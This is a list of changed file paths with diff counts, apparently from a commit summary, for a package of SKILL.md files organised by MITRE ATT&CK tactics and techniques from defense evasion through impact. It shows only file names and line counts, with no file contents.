  291. package/skill/mitre_attack/TA0005_defense-evasion/T1550_use-alternate-authentication-material/SKILL.md +7 -4
  292. package/skill/mitre_attack/TA0005_defense-evasion/T1553.001_gatekeeper-bypass/SKILL.md +22 -4
  293. package/skill/mitre_attack/TA0005_defense-evasion/T1553.002_code-signing/SKILL.md +7 -4
  294. package/skill/mitre_attack/TA0005_defense-evasion/T1553.003_sip-and-trust-provider-hijacking/SKILL.md +28 -4
  295. package/skill/mitre_attack/TA0005_defense-evasion/T1553.004_install-root-certificate/SKILL.md +84 -4
  296. package/skill/mitre_attack/TA0005_defense-evasion/T1553.005_mark-of-the-web-bypass/SKILL.md +75 -4
  297. package/skill/mitre_attack/TA0005_defense-evasion/T1553.006_code-signing-policy-modification/SKILL.md +23 -4
  298. package/skill/mitre_attack/TA0005_defense-evasion/T1553_subvert-trust-controls/SKILL.md +7 -4
  299. package/skill/mitre_attack/TA0005_defense-evasion/T1562.001_disable-or-modify-tools/SKILL.md +81 -4
  300. package/skill/mitre_attack/TA0005_defense-evasion/T1562.002_disable-windows-event-logging/SKILL.md +82 -4
  301. package/skill/mitre_attack/TA0005_defense-evasion/T1562.003_impair-command-history-logging/SKILL.md +84 -4
  302. package/skill/mitre_attack/TA0005_defense-evasion/T1562.004_disable-or-modify-system-firewall/SKILL.md +70 -4
  303. package/skill/mitre_attack/TA0005_defense-evasion/T1562.006_indicator-blocking/SKILL.md +85 -4
  304. package/skill/mitre_attack/TA0005_defense-evasion/T1562.007_disable-or-modify-cloud-firewall/SKILL.md +7 -4
  305. package/skill/mitre_attack/TA0005_defense-evasion/T1562.008_disable-or-modify-cloud-logs/SKILL.md +7 -4
  306. package/skill/mitre_attack/TA0005_defense-evasion/T1562.009_safe-mode-boot/SKILL.md +23 -4
  307. package/skill/mitre_attack/TA0005_defense-evasion/T1562.010_downgrade-attack/SKILL.md +57 -4
  308. package/skill/mitre_attack/TA0005_defense-evasion/T1562.011_spoof-security-alerting/SKILL.md +7 -4
  309. package/skill/mitre_attack/TA0005_defense-evasion/T1562.012_disable-or-modify-linux-audit-system/SKILL.md +40 -4
  310. package/skill/mitre_attack/TA0005_defense-evasion/T1562.013_disable-or-modify-network-device-firewall/SKILL.md +7 -4
  311. package/skill/mitre_attack/TA0005_defense-evasion/T1562_impair-defenses/SKILL.md +51 -4
  312. package/skill/mitre_attack/TA0005_defense-evasion/T1564.001_hidden-files-and-directories/SKILL.md +73 -4
  313. package/skill/mitre_attack/TA0005_defense-evasion/T1564.002_hidden-users/SKILL.md +47 -4
  314. package/skill/mitre_attack/TA0005_defense-evasion/T1564.003_hidden-window/SKILL.md +48 -4
  315. package/skill/mitre_attack/TA0005_defense-evasion/T1564.004_ntfs-file-attributes/SKILL.md +91 -4
  316. package/skill/mitre_attack/TA0005_defense-evasion/T1564.005_hidden-file-system/SKILL.md +7 -4
  317. package/skill/mitre_attack/TA0005_defense-evasion/T1564.006_run-virtual-instance/SKILL.md +75 -6
  318. package/skill/mitre_attack/TA0005_defense-evasion/T1564.007_vba-stomping/SKILL.md +7 -4
  319. package/skill/mitre_attack/TA0005_defense-evasion/T1564.008_email-hiding-rules/SKILL.md +7 -4
  320. package/skill/mitre_attack/TA0005_defense-evasion/T1564.009_resource-forking/SKILL.md +7 -4
  321. package/skill/mitre_attack/TA0005_defense-evasion/T1564.010_process-argument-spoofing/SKILL.md +7 -4
  322. package/skill/mitre_attack/TA0005_defense-evasion/T1564.011_ignore-process-interrupts/SKILL.md +7 -4
  323. package/skill/mitre_attack/TA0005_defense-evasion/T1564.012_filepath-exclusions/SKILL.md +7 -4
  324. package/skill/mitre_attack/TA0005_defense-evasion/T1564.013_bind-mounts/SKILL.md +7 -4
  325. package/skill/mitre_attack/TA0005_defense-evasion/T1564.014_extended-attributes/SKILL.md +7 -4
  326. package/skill/mitre_attack/TA0005_defense-evasion/T1564_hide-artifacts/SKILL.md +92 -4
  327. package/skill/mitre_attack/TA0005_defense-evasion/T1578.001_create-snapshot/SKILL.md +7 -4
  328. package/skill/mitre_attack/TA0005_defense-evasion/T1578.002_create-cloud-instance/SKILL.md +7 -4
  329. package/skill/mitre_attack/TA0005_defense-evasion/T1578.003_delete-cloud-instance/SKILL.md +7 -4
  330. package/skill/mitre_attack/TA0005_defense-evasion/T1578.004_revert-cloud-instance/SKILL.md +7 -4
  331. package/skill/mitre_attack/TA0005_defense-evasion/T1578.005_modify-cloud-compute-configurations/SKILL.md +7 -4
  332. package/skill/mitre_attack/TA0005_defense-evasion/T1578_modify-cloud-compute-infrastructure/SKILL.md +7 -4
  333. package/skill/mitre_attack/TA0005_defense-evasion/T1599.001_network-address-translation-traversal/SKILL.md +7 -4
  334. package/skill/mitre_attack/TA0005_defense-evasion/T1599_network-boundary-bridging/SKILL.md +7 -4
  335. package/skill/mitre_attack/TA0005_defense-evasion/T1600.001_reduce-key-space/SKILL.md +7 -4
  336. package/skill/mitre_attack/TA0005_defense-evasion/T1600.002_disable-crypto-hardware/SKILL.md +7 -4
  337. package/skill/mitre_attack/TA0005_defense-evasion/T1600_weaken-encryption/SKILL.md +7 -4
  338. package/skill/mitre_attack/TA0005_defense-evasion/T1601.001_patch-system-image/SKILL.md +7 -4
  339. package/skill/mitre_attack/TA0005_defense-evasion/T1601.002_downgrade-system-image/SKILL.md +7 -4
  340. package/skill/mitre_attack/TA0005_defense-evasion/T1601_modify-system-image/SKILL.md +7 -4
  341. package/skill/mitre_attack/TA0005_defense-evasion/T1610_deploy-container/SKILL.md +27 -4
  342. package/skill/mitre_attack/TA0005_defense-evasion/T1612_build-image-on-host/SKILL.md +28 -4
  343. package/skill/mitre_attack/TA0005_defense-evasion/T1620_reflective-code-loading/SKILL.md +23 -4
  344. package/skill/mitre_attack/TA0005_defense-evasion/T1622_debugger-evasion/SKILL.md +26 -4
  345. package/skill/mitre_attack/TA0005_defense-evasion/T1647_plist-file-modification/SKILL.md +18 -4
  346. package/skill/mitre_attack/TA0005_defense-evasion/T1656_impersonation/SKILL.md +7 -4
  347. package/skill/mitre_attack/TA0005_defense-evasion/T1666_modify-cloud-resource-hierarchy/SKILL.md +7 -4
  348. package/skill/mitre_attack/TA0005_defense-evasion/T1672_email-spoofing/SKILL.md +7 -4
  349. package/skill/mitre_attack/TA0005_defense-evasion/T1678_delay-execution/SKILL.md +7 -4
  350. package/skill/mitre_attack/TA0005_defense-evasion/T1679_selective-exclusion/SKILL.md +7 -4
  351. package/skill/mitre_attack/TA0006_credential-access/T1003.001_lsass-memory/SKILL.md +88 -4
  352. package/skill/mitre_attack/TA0006_credential-access/T1003.002_security-account-manager/SKILL.md +85 -4
  353. package/skill/mitre_attack/TA0006_credential-access/T1003.003_ntds/SKILL.md +104 -4
  354. package/skill/mitre_attack/TA0006_credential-access/T1003.004_lsa-secrets/SKILL.md +43 -4
  355. package/skill/mitre_attack/TA0006_credential-access/T1003.005_cached-domain-credentials/SKILL.md +26 -4
  356. package/skill/mitre_attack/TA0006_credential-access/T1003.006_dcsync/SKILL.md +44 -4
  357. package/skill/mitre_attack/TA0006_credential-access/T1003.007_proc-filesystem/SKILL.md +98 -4
  358. package/skill/mitre_attack/TA0006_credential-access/T1003.008_etcpasswd-and-etcshadow/SKILL.md +73 -4
  359. package/skill/mitre_attack/TA0006_credential-access/T1003_os-credential-dumping/SKILL.md +107 -4
  360. package/skill/mitre_attack/TA0006_credential-access/T1040_network-sniffing/SKILL.md +93 -4
  361. package/skill/mitre_attack/TA0006_credential-access/T1110.001_password-guessing/SKILL.md +90 -4
  362. package/skill/mitre_attack/TA0006_credential-access/T1110.002_password-cracking/SKILL.md +27 -4
  363. package/skill/mitre_attack/TA0006_credential-access/T1110.003_password-spraying/SKILL.md +89 -4
  364. package/skill/mitre_attack/TA0006_credential-access/T1110.004_credential-stuffing/SKILL.md +69 -4
  365. package/skill/mitre_attack/TA0006_credential-access/T1110_brute-force/SKILL.md +7 -4
  366. package/skill/mitre_attack/TA0006_credential-access/T1111_multi-factor-authentication-interception/SKILL.md +7 -4
  367. package/skill/mitre_attack/TA0006_credential-access/T1187_forced-authentication/SKILL.md +49 -4
  368. package/skill/mitre_attack/TA0006_credential-access/T1212_exploitation-for-credential-access/SKILL.md +7 -4
  369. package/skill/mitre_attack/TA0006_credential-access/T1528_steal-application-access-token/SKILL.md +7 -4
  370. package/skill/mitre_attack/TA0006_credential-access/T1539_steal-web-session-cookie/SKILL.md +123 -4
  371. package/skill/mitre_attack/TA0006_credential-access/T1552.001_credentials-in-files/SKILL.md +68 -4
  372. package/skill/mitre_attack/TA0006_credential-access/T1552.002_credentials-in-registry/SKILL.md +34 -4
  373. package/skill/mitre_attack/TA0006_credential-access/T1552.003_shell-history/SKILL.md +32 -4
  374. package/skill/mitre_attack/TA0006_credential-access/T1552.004_private-keys/SKILL.md +73 -4
  375. package/skill/mitre_attack/TA0006_credential-access/T1552.005_cloud-instance-metadata-api/SKILL.md +7 -4
  376. package/skill/mitre_attack/TA0006_credential-access/T1552.006_group-policy-preferences/SKILL.md +44 -4
  377. package/skill/mitre_attack/TA0006_credential-access/T1552.007_container-api/SKILL.md +41 -4
  378. package/skill/mitre_attack/TA0006_credential-access/T1552.008_chat-messages/SKILL.md +7 -4
  379. package/skill/mitre_attack/TA0006_credential-access/T1552_unsecured-credentials/SKILL.md +43 -4
  380. package/skill/mitre_attack/TA0006_credential-access/T1555.001_keychain/SKILL.md +60 -4
  381. package/skill/mitre_attack/TA0006_credential-access/T1555.002_securityd-memory/SKILL.md +7 -4
  382. package/skill/mitre_attack/TA0006_credential-access/T1555.003_credentials-from-web-browsers/SKILL.md +85 -4
  383. package/skill/mitre_attack/TA0006_credential-access/T1555.004_windows-credential-manager/SKILL.md +36 -4
  384. package/skill/mitre_attack/TA0006_credential-access/T1555.005_password-managers/SKILL.md +7 -4
  385. package/skill/mitre_attack/TA0006_credential-access/T1555.006_cloud-secrets-management-stores/SKILL.md +7 -4
  386. package/skill/mitre_attack/TA0006_credential-access/T1555_credentials-from-password-stores/SKILL.md +68 -4
  387. package/skill/mitre_attack/TA0006_credential-access/T1556.001_domain-controller-authentication/SKILL.md +30 -4
  388. package/skill/mitre_attack/TA0006_credential-access/T1556.002_password-filter-dll/SKILL.md +59 -4
  389. package/skill/mitre_attack/TA0006_credential-access/T1556.003_pluggable-authentication-modules/SKILL.md +55 -4
  390. package/skill/mitre_attack/TA0006_credential-access/T1556.004_network-device-authentication/SKILL.md +7 -4
  391. package/skill/mitre_attack/TA0006_credential-access/T1556.005_reversible-encryption/SKILL.md +7 -4
  392. package/skill/mitre_attack/TA0006_credential-access/T1556.006_multi-factor-authentication/SKILL.md +7 -4
  393. package/skill/mitre_attack/TA0006_credential-access/T1556.007_hybrid-identity/SKILL.md +7 -4
  394. package/skill/mitre_attack/TA0006_credential-access/T1556.008_network-provider-dll/SKILL.md +7 -4
  395. package/skill/mitre_attack/TA0006_credential-access/T1556.009_conditional-access-policies/SKILL.md +7 -4
  396. package/skill/mitre_attack/TA0006_credential-access/T1556_modify-authentication-process/SKILL.md +7 -4
  397. package/skill/mitre_attack/TA0006_credential-access/T1557.001_llmnrnbt-ns-poisoning-and-smb-relay/SKILL.md +25 -4
  398. package/skill/mitre_attack/TA0006_credential-access/T1557.002_arp-cache-poisoning/SKILL.md +7 -4
  399. package/skill/mitre_attack/TA0006_credential-access/T1557.003_dhcp-spoofing/SKILL.md +7 -4
  400. package/skill/mitre_attack/TA0006_credential-access/T1557.004_evil-twin/SKILL.md +7 -4
  401. package/skill/mitre_attack/TA0006_credential-access/T1557_adversary-in-the-middle/SKILL.md +7 -4
  402. package/skill/mitre_attack/TA0006_credential-access/T1558.001_golden-ticket/SKILL.md +138 -4
  403. package/skill/mitre_attack/TA0006_credential-access/T1558.002_silver-ticket/SKILL.md +76 -4
  404. package/skill/mitre_attack/TA0006_credential-access/T1558.003_kerberoasting/SKILL.md +93 -4
  405. package/skill/mitre_attack/TA0006_credential-access/T1558.004_as-rep-roasting/SKILL.md +49 -4
  406. package/skill/mitre_attack/TA0006_credential-access/T1558.005_ccache-files/SKILL.md +7 -4
  407. package/skill/mitre_attack/TA0006_credential-access/T1558_steal-or-forge-kerberos-tickets/SKILL.md +7 -4
  408. package/skill/mitre_attack/TA0006_credential-access/T1606.001_web-cookies/SKILL.md +7 -4
  409. package/skill/mitre_attack/TA0006_credential-access/T1606.002_saml-tokens/SKILL.md +7 -4
  410. package/skill/mitre_attack/TA0006_credential-access/T1606_forge-web-credentials/SKILL.md +7 -4
  411. package/skill/mitre_attack/TA0006_credential-access/T1621_multi-factor-authentication-request-generation/SKILL.md +7 -4
  412. package/skill/mitre_attack/TA0006_credential-access/T1649_steal-or-forge-authentication-certificates/SKILL.md +28 -4
  413. package/skill/mitre_attack/TA0007_discovery/T1007_system-service-discovery/SKILL.md +70 -4
  414. package/skill/mitre_attack/TA0007_discovery/T1010_application-window-discovery/SKILL.md +28 -4
  415. package/skill/mitre_attack/TA0007_discovery/T1012_query-registry/SKILL.md +132 -7
  416. package/skill/mitre_attack/TA0007_discovery/T1016.001_internet-connection-discovery/SKILL.md +62 -4
  417. package/skill/mitre_attack/TA0007_discovery/T1016.002_wi-fi-discovery/SKILL.md +22 -4
  418. package/skill/mitre_attack/TA0007_discovery/T1016_system-network-configuration-discovery/SKILL.md +114 -4
  419. package/skill/mitre_attack/TA0007_discovery/T1018_remote-system-discovery/SKILL.md +73 -4
  420. package/skill/mitre_attack/TA0007_discovery/T1033_system-owneruser-discovery/SKILL.md +78 -4
  421. package/skill/mitre_attack/TA0007_discovery/T1046_network-service-discovery/SKILL.md +81 -4
  422. package/skill/mitre_attack/TA0007_discovery/T1049_system-network-connections-discovery/SKILL.md +84 -4
  423. package/skill/mitre_attack/TA0007_discovery/T1057_process-discovery/SKILL.md +73 -4
  424. package/skill/mitre_attack/TA0007_discovery/T1069.001_local-groups/SKILL.md +76 -4
  425. package/skill/mitre_attack/TA0007_discovery/T1069.002_domain-groups/SKILL.md +73 -4
  426. package/skill/mitre_attack/TA0007_discovery/T1069.003_cloud-groups/SKILL.md +7 -4
  427. package/skill/mitre_attack/TA0007_discovery/T1069_permission-groups-discovery/SKILL.md +7 -4
  428. package/skill/mitre_attack/TA0007_discovery/T1082_system-information-discovery/SKILL.md +83 -4
  429. package/skill/mitre_attack/TA0007_discovery/T1083_file-and-directory-discovery/SKILL.md +99 -4
  430. package/skill/mitre_attack/TA0007_discovery/T1087.001_local-account/SKILL.md +76 -4
  431. package/skill/mitre_attack/TA0007_discovery/T1087.002_domain-account/SKILL.md +74 -4
  432. package/skill/mitre_attack/TA0007_discovery/T1087.003_email-account/SKILL.md +7 -4
  433. package/skill/mitre_attack/TA0007_discovery/T1087.004_cloud-account/SKILL.md +7 -4
  434. package/skill/mitre_attack/TA0007_discovery/T1087_account-discovery/SKILL.md +7 -4
  435. package/skill/mitre_attack/TA0007_discovery/T1120_peripheral-device-discovery/SKILL.md +57 -4
  436. package/skill/mitre_attack/TA0007_discovery/T1124_system-time-discovery/SKILL.md +68 -4
  437. package/skill/mitre_attack/TA0007_discovery/T1135_network-share-discovery/SKILL.md +74 -4
  438. package/skill/mitre_attack/TA0007_discovery/T1201_password-policy-discovery/SKILL.md +69 -4
  439. package/skill/mitre_attack/TA0007_discovery/T1217_browser-information-discovery/SKILL.md +67 -4
  440. package/skill/mitre_attack/TA0007_discovery/T1482_domain-trust-discovery/SKILL.md +87 -4
  441. package/skill/mitre_attack/TA0007_discovery/T1518.001_security-software-discovery/SKILL.md +95 -4
  442. package/skill/mitre_attack/TA0007_discovery/T1518.002_backup-software-discovery/SKILL.md +7 -4
  443. package/skill/mitre_attack/TA0007_discovery/T1518_software-discovery/SKILL.md +68 -4
  444. package/skill/mitre_attack/TA0007_discovery/T1526_cloud-service-discovery/SKILL.md +7 -4
  445. package/skill/mitre_attack/TA0007_discovery/T1538_cloud-service-dashboard/SKILL.md +7 -4
  446. package/skill/mitre_attack/TA0007_discovery/T1580_cloud-infrastructure-discovery/SKILL.md +7 -4
  447. package/skill/mitre_attack/TA0007_discovery/T1613_container-and-resource-discovery/SKILL.md +48 -4
  448. package/skill/mitre_attack/TA0007_discovery/T1614.001_system-language-discovery/SKILL.md +80 -4
  449. package/skill/mitre_attack/TA0007_discovery/T1614_system-location-discovery/SKILL.md +35 -4
  450. package/skill/mitre_attack/TA0007_discovery/T1615_group-policy-discovery/SKILL.md +74 -4
  451. package/skill/mitre_attack/TA0007_discovery/T1619_cloud-storage-object-discovery/SKILL.md +7 -4
  452. package/skill/mitre_attack/TA0007_discovery/T1652_device-driver-discovery/SKILL.md +66 -4
  453. package/skill/mitre_attack/TA0007_discovery/T1654_log-enumeration/SKILL.md +43 -4
  454. package/skill/mitre_attack/TA0007_discovery/T1673_virtual-machine-discovery/SKILL.md +7 -4
  455. package/skill/mitre_attack/TA0007_discovery/T1680_local-storage-discovery/SKILL.md +7 -4
  456. package/skill/mitre_attack/TA0008_lateral-movement/T1021.001_remote-desktop-protocol/SKILL.md +66 -4
  457. package/skill/mitre_attack/TA0008_lateral-movement/T1021.002_smbwindows-admin-shares/SKILL.md +58 -4
  458. package/skill/mitre_attack/TA0008_lateral-movement/T1021.003_distributed-component-object-model/SKILL.md +49 -4
  459. package/skill/mitre_attack/TA0008_lateral-movement/T1021.004_ssh/SKILL.md +7 -4
  460. package/skill/mitre_attack/TA0008_lateral-movement/T1021.005_vnc/SKILL.md +26 -4
  461. package/skill/mitre_attack/TA0008_lateral-movement/T1021.006_windows-remote-management/SKILL.md +53 -4
  462. package/skill/mitre_attack/TA0008_lateral-movement/T1021.007_cloud-services/SKILL.md +7 -4
  463. package/skill/mitre_attack/TA0008_lateral-movement/T1021.008_direct-cloud-vm-connections/SKILL.md +7 -4
  464. package/skill/mitre_attack/TA0008_lateral-movement/T1021_remote-services/SKILL.md +7 -4
  465. package/skill/mitre_attack/TA0008_lateral-movement/T1080_taint-shared-content/SKILL.md +7 -4
  466. package/skill/mitre_attack/TA0008_lateral-movement/T1091_replication-through-removable-media/SKILL.md +28 -4
  467. package/skill/mitre_attack/TA0008_lateral-movement/T1210_exploitation-of-remote-services/SKILL.md +7 -4
  468. package/skill/mitre_attack/TA0008_lateral-movement/T1534_internal-spearphishing/SKILL.md +7 -4
  469. package/skill/mitre_attack/TA0008_lateral-movement/T1563.001_ssh-hijacking/SKILL.md +7 -4
  470. package/skill/mitre_attack/TA0008_lateral-movement/T1563.002_rdp-hijacking/SKILL.md +25 -4
  471. package/skill/mitre_attack/TA0008_lateral-movement/T1563_remote-service-session-hijacking/SKILL.md +7 -4
  472. package/skill/mitre_attack/TA0008_lateral-movement/T1570_lateral-tool-transfer/SKILL.md +44 -4
  473. package/skill/mitre_attack/TA0009_collection/T1005_data-from-local-system/SKILL.md +75 -4
  474. package/skill/mitre_attack/TA0009_collection/T1025_data-from-removable-media/SKILL.md +25 -4
  475. package/skill/mitre_attack/TA0009_collection/T1039_data-from-network-shared-drive/SKILL.md +44 -4
  476. package/skill/mitre_attack/TA0009_collection/T1056.001_keylogging/SKILL.md +106 -4
  477. package/skill/mitre_attack/TA0009_collection/T1056.002_gui-input-capture/SKILL.md +50 -4
  478. package/skill/mitre_attack/TA0009_collection/T1056.003_web-portal-capture/SKILL.md +7 -4
  479. package/skill/mitre_attack/TA0009_collection/T1056.004_credential-api-hooking/SKILL.md +28 -4
  480. package/skill/mitre_attack/TA0009_collection/T1056_input-capture/SKILL.md +7 -4
  481. package/skill/mitre_attack/TA0009_collection/T1074.001_local-data-staging/SKILL.md +47 -4
  482. package/skill/mitre_attack/TA0009_collection/T1074.002_remote-data-staging/SKILL.md +7 -4
  483. package/skill/mitre_attack/TA0009_collection/T1074_data-staged/SKILL.md +7 -4
  484. package/skill/mitre_attack/TA0009_collection/T1113_screen-capture/SKILL.md +73 -4
  485. package/skill/mitre_attack/TA0009_collection/T1114.001_local-email-collection/SKILL.md +28 -4
  486. package/skill/mitre_attack/TA0009_collection/T1114.002_remote-email-collection/SKILL.md +7 -4
  487. package/skill/mitre_attack/TA0009_collection/T1114.003_email-forwarding-rule/SKILL.md +7 -4
  488. package/skill/mitre_attack/TA0009_collection/T1114_email-collection/SKILL.md +7 -4
  489. package/skill/mitre_attack/TA0009_collection/T1115_clipboard-data/SKILL.md +74 -4
  490. package/skill/mitre_attack/TA0009_collection/T1119_automated-collection/SKILL.md +64 -4
  491. package/skill/mitre_attack/TA0009_collection/T1123_audio-capture/SKILL.md +54 -4
  492. package/skill/mitre_attack/TA0009_collection/T1125_video-capture/SKILL.md +23 -4
  493. package/skill/mitre_attack/TA0009_collection/T1185_browser-session-hijacking/SKILL.md +7 -4
  494. package/skill/mitre_attack/TA0009_collection/T1213.001_confluence/SKILL.md +7 -4
  495. package/skill/mitre_attack/TA0009_collection/T1213.002_sharepoint/SKILL.md +7 -4
  496. package/skill/mitre_attack/TA0009_collection/T1213.003_code-repositories/SKILL.md +7 -4
  497. package/skill/mitre_attack/TA0009_collection/T1213.004_customer-relationship-management-software/SKILL.md +7 -4
  498. package/skill/mitre_attack/TA0009_collection/T1213.005_messaging-applications/SKILL.md +7 -4
  499. package/skill/mitre_attack/TA0009_collection/T1213.006_databases/SKILL.md +7 -4
  500. package/skill/mitre_attack/TA0009_collection/T1213_data-from-information-repositories/SKILL.md +7 -4
  501. package/skill/mitre_attack/TA0009_collection/T1530_data-from-cloud-storage/SKILL.md +7 -4
  502. package/skill/mitre_attack/TA0009_collection/T1560.001_archive-via-utility/SKILL.md +94 -4
  503. package/skill/mitre_attack/TA0009_collection/T1560.002_archive-via-library/SKILL.md +68 -4
  504. package/skill/mitre_attack/TA0009_collection/T1560.003_archive-via-custom-method/SKILL.md +7 -4
  505. package/skill/mitre_attack/TA0009_collection/T1560_archive-collected-data/SKILL.md +23 -4
  506. package/skill/mitre_attack/TA0009_collection/T1602.001_snmp-mib-dump/SKILL.md +7 -4
  507. package/skill/mitre_attack/TA0009_collection/T1602.002_network-device-configuration-dump/SKILL.md +7 -4
  508. package/skill/mitre_attack/TA0009_collection/T1602_data-from-configuration-repository/SKILL.md +7 -4
  509. package/skill/mitre_attack/TA0010_exfiltration/T1011.001_exfiltration-over-bluetooth/SKILL.md +7 -4
  510. package/skill/mitre_attack/TA0010_exfiltration/T1011_exfiltration-over-other-network-medium/SKILL.md +7 -4
  511. package/skill/mitre_attack/TA0010_exfiltration/T1020.001_traffic-duplication/SKILL.md +7 -4
  512. package/skill/mitre_attack/TA0010_exfiltration/T1020_automated-exfiltration/SKILL.md +42 -4
  513. package/skill/mitre_attack/TA0010_exfiltration/T1029_scheduled-transfer/SKILL.md +7 -4
  514. package/skill/mitre_attack/TA0010_exfiltration/T1030_data-transfer-size-limits/SKILL.md +44 -4
  515. package/skill/mitre_attack/TA0010_exfiltration/T1041_exfiltration-over-c2-channel/SKILL.md +49 -4
  516. package/skill/mitre_attack/TA0010_exfiltration/T1048.001_exfiltration-over-symmetric-encrypted-non-c2-protocol/SKILL.md +7 -4
  517. package/skill/mitre_attack/TA0010_exfiltration/T1048.002_exfiltration-over-asymmetric-encrypted-non-c2-protocol/SKILL.md +56 -4
  518. package/skill/mitre_attack/TA0010_exfiltration/T1048.003_exfiltration-over-unencrypted-non-c2-protocol/SKILL.md +61 -4
  519. package/skill/mitre_attack/TA0010_exfiltration/T1048_exfiltration-over-alternative-protocol/SKILL.md +70 -4
  520. package/skill/mitre_attack/TA0010_exfiltration/T1052.001_exfiltration-over-usb/SKILL.md +7 -4
  521. package/skill/mitre_attack/TA0010_exfiltration/T1052_exfiltration-over-physical-medium/SKILL.md +7 -4
  522. package/skill/mitre_attack/TA0010_exfiltration/T1537_transfer-data-to-cloud-account/SKILL.md +7 -4
  523. package/skill/mitre_attack/TA0010_exfiltration/T1567.001_exfiltration-to-code-repository/SKILL.md +7 -4
  524. package/skill/mitre_attack/TA0010_exfiltration/T1567.002_exfiltration-to-cloud-storage/SKILL.md +77 -7
  525. package/skill/mitre_attack/TA0010_exfiltration/T1567.003_exfiltration-to-text-storage-sites/SKILL.md +32 -4
  526. package/skill/mitre_attack/TA0010_exfiltration/T1567.004_exfiltration-over-webhook/SKILL.md +7 -4
  527. package/skill/mitre_attack/TA0010_exfiltration/T1567_exfiltration-over-web-service/SKILL.md +7 -4
  528. package/skill/mitre_attack/TA0011_command-and-control/T1001.001_junk-data/SKILL.md +7 -4
  529. package/skill/mitre_attack/TA0011_command-and-control/T1001.002_steganography/SKILL.md +84 -4
  530. package/skill/mitre_attack/TA0011_command-and-control/T1001.003_protocol-or-service-impersonation/SKILL.md +7 -4
  531. package/skill/mitre_attack/TA0011_command-and-control/T1001_data-obfuscation/SKILL.md +7 -4
  532. package/skill/mitre_attack/TA0011_command-and-control/T1008_fallback-channels/SKILL.md +7 -4
  533. package/skill/mitre_attack/TA0011_command-and-control/T1071.001_web-protocols/SKILL.md +61 -4
  534. package/skill/mitre_attack/TA0011_command-and-control/T1071.002_file-transfer-protocols/SKILL.md +7 -4
  535. package/skill/mitre_attack/TA0011_command-and-control/T1071.003_mail-protocols/SKILL.md +7 -4
  536. package/skill/mitre_attack/TA0011_command-and-control/T1071.004_dns/SKILL.md +66 -4
  537. package/skill/mitre_attack/TA0011_command-and-control/T1071.005_publishsubscribe-protocols/SKILL.md +7 -4
  538. package/skill/mitre_attack/TA0011_command-and-control/T1071_application-layer-protocol/SKILL.md +25 -4
  539. package/skill/mitre_attack/TA0011_command-and-control/T1090.001_internal-proxy/SKILL.md +55 -4
  540. package/skill/mitre_attack/TA0011_command-and-control/T1090.002_external-proxy/SKILL.md +7 -4
  541. package/skill/mitre_attack/TA0011_command-and-control/T1090.003_multi-hop-proxy/SKILL.md +77 -4
  542. package/skill/mitre_attack/TA0011_command-and-control/T1090.004_domain-fronting/SKILL.md +7 -4
  543. package/skill/mitre_attack/TA0011_command-and-control/T1090_proxy/SKILL.md +7 -4
  544. package/skill/mitre_attack/TA0011_command-and-control/T1092_communication-through-removable-media/SKILL.md +7 -4
  545. package/skill/mitre_attack/TA0011_command-and-control/T1095_non-application-layer-protocol/SKILL.md +66 -4
  546. package/skill/mitre_attack/TA0011_command-and-control/T1102.001_dead-drop-resolver/SKILL.md +7 -4
  547. package/skill/mitre_attack/TA0011_command-and-control/T1102.002_bidirectional-communication/SKILL.md +7 -4
  548. package/skill/mitre_attack/TA0011_command-and-control/T1102.003_one-way-communication/SKILL.md +7 -4
  549. package/skill/mitre_attack/TA0011_command-and-control/T1102_web-service/SKILL.md +7 -4
  550. package/skill/mitre_attack/TA0011_command-and-control/T1104_multi-stage-channels/SKILL.md +7 -4
  551. package/skill/mitre_attack/TA0011_command-and-control/T1105_ingress-tool-transfer/SKILL.md +69 -4
  552. package/skill/mitre_attack/TA0011_command-and-control/T1132.001_standard-encoding/SKILL.md +56 -4
  553. package/skill/mitre_attack/TA0011_command-and-control/T1132.002_non-standard-encoding/SKILL.md +7 -4
  554. package/skill/mitre_attack/TA0011_command-and-control/T1132_data-encoding/SKILL.md +7 -4
  555. package/skill/mitre_attack/TA0011_command-and-control/T1219.001_ide-tunneling/SKILL.md +7 -4
  556. package/skill/mitre_attack/TA0011_command-and-control/T1219.002_remote-desktop-software/SKILL.md +7 -4
  557. package/skill/mitre_attack/TA0011_command-and-control/T1219.003_remote-access-hardware/SKILL.md +7 -4
  558. package/skill/mitre_attack/TA0011_command-and-control/T1219_remote-access-tools/SKILL.md +80 -4
  559. package/skill/mitre_attack/TA0011_command-and-control/T1568.001_fast-flux-dns/SKILL.md +7 -4
  560. package/skill/mitre_attack/TA0011_command-and-control/T1568.002_domain-generation-algorithms/SKILL.md +7 -4
  561. package/skill/mitre_attack/TA0011_command-and-control/T1568.003_dns-calculation/SKILL.md +7 -4
  562. package/skill/mitre_attack/TA0011_command-and-control/T1568_dynamic-resolution/SKILL.md +7 -4
  563. package/skill/mitre_attack/TA0011_command-and-control/T1571_non-standard-port/SKILL.md +37 -4
  564. package/skill/mitre_attack/TA0011_command-and-control/T1572_protocol-tunneling/SKILL.md +86 -4
  565. package/skill/mitre_attack/TA0011_command-and-control/T1573.001_symmetric-cryptography/SKILL.md +7 -4
  566. package/skill/mitre_attack/TA0011_command-and-control/T1573.002_asymmetric-cryptography/SKILL.md +7 -4
  567. package/skill/mitre_attack/TA0011_command-and-control/T1573_encrypted-channel/SKILL.md +42 -4
  568. package/skill/mitre_attack/TA0011_command-and-control/T1665_hide-infrastructure/SKILL.md +7 -4
  569. package/skill/mitre_attack/TA0040_impact/T1485.001_lifecycle-triggered-deletion/SKILL.md +7 -4
  570. package/skill/mitre_attack/TA0040_impact/T1485_data-destruction/SKILL.md +65 -4
  571. package/skill/mitre_attack/TA0040_impact/T1486_data-encrypted-for-impact/SKILL.md +81 -4
  572. package/skill/mitre_attack/TA0040_impact/T1489_service-stop/SKILL.md +78 -4
  573. package/skill/mitre_attack/TA0040_impact/T1490_inhibit-system-recovery/SKILL.md +84 -4
  574. package/skill/mitre_attack/TA0040_impact/T1491.001_internal-defacement/SKILL.md +119 -4
  575. package/skill/mitre_attack/TA0040_impact/T1491.002_external-defacement/SKILL.md +7 -4
  576. package/skill/mitre_attack/TA0040_impact/T1491_defacement/SKILL.md +7 -4
  577. package/skill/mitre_attack/TA0040_impact/T1495_firmware-corruption/SKILL.md +7 -4
  578. package/skill/mitre_attack/TA0040_impact/T1496.001_compute-hijacking/SKILL.md +7 -4
  579. package/skill/mitre_attack/TA0040_impact/T1496.002_bandwidth-hijacking/SKILL.md +7 -4
  580. package/skill/mitre_attack/TA0040_impact/T1496.003_sms-pumping/SKILL.md +7 -4
